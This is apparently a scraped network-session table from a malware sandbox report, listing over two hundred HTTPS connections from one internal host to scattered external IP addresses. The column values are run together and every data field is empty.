                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13705192.168.2.2333706152.114.22.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13706192.168.2.2349874117.213.40.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13707192.168.2.2347368187.2.57.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13708192.168.2.235934293.30.225.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13709192.168.2.2356916123.226.223.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13710192.168.2.2348378146.131.152.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13711192.168.2.233316288.108.66.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13712192.168.2.234997840.88.206.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13713192.168.2.234987220.234.79.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13714192.168.2.2342482111.190.58.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13715192.168.2.2351962105.135.205.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13716192.168.2.2353818102.70.220.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13717192.168.2.2338870163.42.92.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13718192.168.2.235172045.31.109.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13719192.168.2.2343342213.81.38.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13720192.168.2.2351804118.217.174.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13721192.168.2.2357460218.125.253.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13722192.168.2.2344688221.69.13.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13723192.168.2.2360994172.206.165.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13724192.168.2.2353038139.27.233.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13725192.168.2.2346230164.183.201.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13726192.168.2.2359354147.254.114.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13727192.168.2.234607420.27.26.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13728192.168.2.2337996131.68.59.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13729192.168.2.235350043.15.75.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13730192.168.2.236013078.32.11.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13731192.168.2.2339782201.44.27.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13732192.168.2.2342288198.75.17.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13733192.168.2.235276084.238.223.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13734192.168.2.2353120152.230.63.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13735192.168.2.2356250158.116.53.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13736192.168.2.234963470.210.159.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13737192.168.2.2358608171.252.60.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13738192.168.2.235865680.27.223.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13739192.168.2.2342938210.116.1.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13740192.168.2.2340640142.254.123.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13741192.168.2.2349164174.114.198.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13742192.168.2.235915023.247.71.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13743192.168.2.2340570140.97.121.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13744192.168.2.234230240.236.236.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13745192.168.2.2340980115.147.10.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13746192.168.2.2347188209.134.214.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13747192.168.2.2338556176.206.193.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13748192.168.2.2350186168.189.92.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13749192.168.2.233454872.251.96.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13750192.168.2.2343828172.243.29.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13751192.168.2.2342282136.167.194.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13752192.168.2.2359856132.106.98.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13753192.168.2.235824224.237.52.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13754192.168.2.2353336128.132.109.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13755192.168.2.2354908135.33.97.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13756192.168.2.234465089.96.13.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13757192.168.2.2358826172.206.77.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13758192.168.2.234135027.25.47.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13759192.168.2.235702666.254.126.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13760192.168.2.2356818152.46.238.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13761192.168.2.234166214.152.94.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13762192.168.2.233734270.131.102.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13763192.168.2.235774246.219.233.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13764192.168.2.23381485.154.178.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13765192.168.2.2344138197.73.55.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13766192.168.2.233464648.62.178.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13767192.168.2.233295279.194.108.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13768192.168.2.233540647.180.93.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13769192.168.2.235777493.138.118.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13770192.168.2.2351466118.164.21.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13771192.168.2.2356104123.137.175.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13772192.168.2.234535252.112.87.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13773192.168.2.235021852.86.4.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13774192.168.2.2347946135.1.108.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13775192.168.2.236054441.161.205.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13776192.168.2.2357146218.254.162.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13777192.168.2.2350600181.239.53.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13778192.168.2.2349186204.40.184.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13779192.168.2.235877492.18.229.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13780192.168.2.2346474181.139.183.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13781192.168.2.236063617.40.197.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13782192.168.2.2342758212.0.117.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13783192.168.2.234188878.133.233.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13784192.168.2.2342012187.124.120.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13785192.168.2.2353230103.243.113.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13786192.168.2.235549432.28.10.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13787192.168.2.2338022137.199.207.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13788192.168.2.235796860.218.58.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13789192.168.2.2343702153.218.238.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13790192.168.2.2339564176.207.121.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13791192.168.2.2333830201.236.247.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13792192.168.2.234101866.33.192.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13793192.168.2.2333820118.125.217.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13794192.168.2.2341186182.20.252.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13795192.168.2.2343816209.43.7.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13796192.168.2.235455882.248.172.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13797192.168.2.233305672.120.232.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13798192.168.2.2347496184.85.24.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13799192.168.2.2360884216.174.172.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13800192.168.2.2345492120.212.111.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13801192.168.2.2334172137.16.218.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13802192.168.2.2335018217.225.55.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13803192.168.2.235860080.147.117.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13804192.168.2.2343382100.27.16.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13805192.168.2.2347392124.13.20.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13806192.168.2.2333930142.25.13.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13807192.168.2.2335554175.194.226.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13808192.168.2.2337340103.73.33.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13809192.168.2.2333054189.146.97.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13810192.168.2.2352618110.5.240.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13811192.168.2.2360564191.161.61.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13812192.168.2.2358824102.25.81.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13813192.168.2.2351956164.44.62.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13814192.168.2.2349652117.61.146.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13815192.168.2.233368451.114.69.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13816192.168.2.2353900159.56.148.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13817192.168.2.2339840145.237.178.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13818192.168.2.2336036114.39.60.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13819192.168.2.23422102.75.113.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13820192.168.2.2337660173.72.118.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13821192.168.2.235496263.152.187.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13822192.168.2.2349716216.251.220.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13823192.168.2.23403808.123.212.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13824192.168.2.234935676.201.123.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13825192.168.2.234435019.17.123.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13826192.168.2.2349308141.67.10.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13827192.168.2.233944639.249.170.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13828192.168.2.2352828218.140.215.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13829192.168.2.23364021.58.239.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13830192.168.2.2358582171.36.61.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13831192.168.2.233315097.200.211.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13832192.168.2.23358342.232.181.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13833192.168.2.235574897.150.104.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13834192.168.2.2358190170.126.121.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13835192.168.2.234768058.66.146.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13836192.168.2.233767695.174.87.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13837192.168.2.233528223.230.58.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13838192.168.2.2335738188.98.61.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13839192.168.2.2343096203.104.185.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13840192.168.2.233492499.75.178.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13841192.168.2.2358372204.74.193.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13842192.168.2.2346706163.7.252.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13843192.168.2.2356836153.43.2.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13844192.168.2.236007285.22.99.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13845192.168.2.234966812.130.91.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13846192.168.2.2353598206.76.131.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13847192.168.2.235805236.246.184.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13848192.168.2.2354942182.71.86.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13849192.168.2.233479095.130.202.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13850192.168.2.2354194222.174.242.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13851192.168.2.2339502126.211.149.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13852192.168.2.2335150147.188.217.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13853192.168.2.234528275.21.249.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13854192.168.2.2343802194.164.210.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13855192.168.2.2349608217.210.224.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13856192.168.2.2359190172.51.133.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13857192.168.2.235090870.81.211.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13858192.168.2.234420490.51.166.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13859192.168.2.2338272197.146.68.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13860192.168.2.234509612.185.38.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13861192.168.2.233819848.163.15.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13862192.168.2.2333786124.237.230.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13863192.168.2.2355536131.225.179.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13864192.168.2.2357786160.175.156.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13865192.168.2.2336674171.89.32.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13866192.168.2.2346442196.174.228.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13867192.168.2.235416213.187.252.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13868192.168.2.2341972204.37.170.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13869192.168.2.23387469.10.231.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13870192.168.2.2347258151.3.74.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13871192.168.2.23447965.242.152.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13872192.168.2.2341276207.117.70.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13873192.168.2.235953012.162.142.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13874192.168.2.234946287.72.130.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13875192.168.2.2332928161.20.2.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13876192.168.2.234450469.94.214.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13877192.168.2.2342072120.72.253.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13878192.168.2.235966486.196.140.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13879192.168.2.2343118111.135.70.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13880192.168.2.233915497.222.90.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13881192.168.2.235493489.57.255.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13882192.168.2.235541875.29.36.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13883192.168.2.2340974181.30.155.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13884192.168.2.234866625.240.220.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13885192.168.2.235984838.181.93.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13886192.168.2.235800472.230.107.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13887192.168.2.235525650.239.21.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13888192.168.2.235049067.146.207.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13889192.168.2.2352682113.237.90.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13890192.168.2.2358280191.219.116.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13891192.168.2.235567495.59.145.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13892192.168.2.234841235.67.33.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13893192.168.2.2355946147.126.2.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13894192.168.2.2339774191.231.45.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13895192.168.2.235252024.230.217.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13896192.168.2.234667871.126.20.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13897192.168.2.2344236131.119.146.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13898192.168.2.234998641.165.123.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13899192.168.2.235500812.141.25.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13900192.168.2.233767866.119.115.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13901192.168.2.233614645.38.39.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13902192.168.2.2351836171.101.210.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13903192.168.2.234403091.48.84.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13904192.168.2.233355495.71.65.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13905192.168.2.234130248.161.250.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13906192.168.2.2347444213.90.243.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13907192.168.2.233650267.215.5.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13908192.168.2.235306057.90.189.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13909192.168.2.233533285.97.65.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13910192.168.2.235614884.196.217.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13911192.168.2.2348188150.53.72.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13912192.168.2.234144882.41.58.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13913192.168.2.2359098105.208.14.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13914192.168.2.234184439.178.38.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13915192.168.2.236044882.31.167.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13916192.168.2.2343500179.250.210.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13917192.168.2.2350050135.209.67.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13918192.168.2.2334734120.234.251.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13919192.168.2.2356804174.63.0.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13920192.168.2.2345616133.220.177.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13921192.168.2.2349136193.134.35.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13922192.168.2.2353558150.39.20.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13923192.168.2.2350798165.227.193.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13924192.168.2.233416059.82.121.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13925192.168.2.2343296110.113.124.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13926192.168.2.233974443.170.221.70443
                                                TimestampBytes transferredDirectionData


